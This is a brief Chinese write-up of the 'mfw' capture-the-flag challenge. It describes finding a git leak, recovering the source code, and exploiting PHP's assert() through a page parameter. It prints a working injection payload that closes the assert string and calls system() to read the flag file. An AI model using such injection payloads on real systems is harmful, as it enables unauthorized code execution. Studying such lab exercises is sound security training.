攻防世界mfw(PHP assert命令执行注入)
该题目通过扫面后台目录发现存在git泄漏,用GitHack跑完后发现了该题目的源码,漏洞利用在assert函数任意代码执行,如下图。
我们传入payload:?page=abc') or system("cat templates/flag.php");//
则变为
assert("file_exists('templates/abc') or system("cat templates/flag.php");//.php')") or die("That file doesn't exist!");
从而实现任意代码执行。
总结:
assert函数中可以利用or执行其他命令。